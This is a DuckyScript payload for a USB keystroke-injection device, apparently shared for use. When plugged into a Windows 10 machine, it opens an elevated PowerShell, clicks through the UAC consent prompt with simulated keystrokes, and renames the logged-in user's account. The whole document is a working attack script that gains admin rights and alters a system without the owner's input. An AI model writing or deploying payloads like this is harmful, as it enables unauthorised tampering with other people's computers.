REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
REM Description: Changes the Windows 10 username to the name of your choice.
REM Version: 1.0
REM Category: Execution
DELAY 750
WINDOWS d
DELAY 1500
WINDOWS r
DELAY 1500
STRING powershell Start-Process powershell -Verb runAs
ENTER
DELAY 560
LEFTARROW
DELAY 500
ENTER
DELAY 700
STRING $User = ([Environment]::UserName)
DELAY 300
ENTER
DELAY 500
STRING Rename-LocalUser -Name $User -NewName "New Name"
DELAY 300
ENTER
DELAY 500
exit
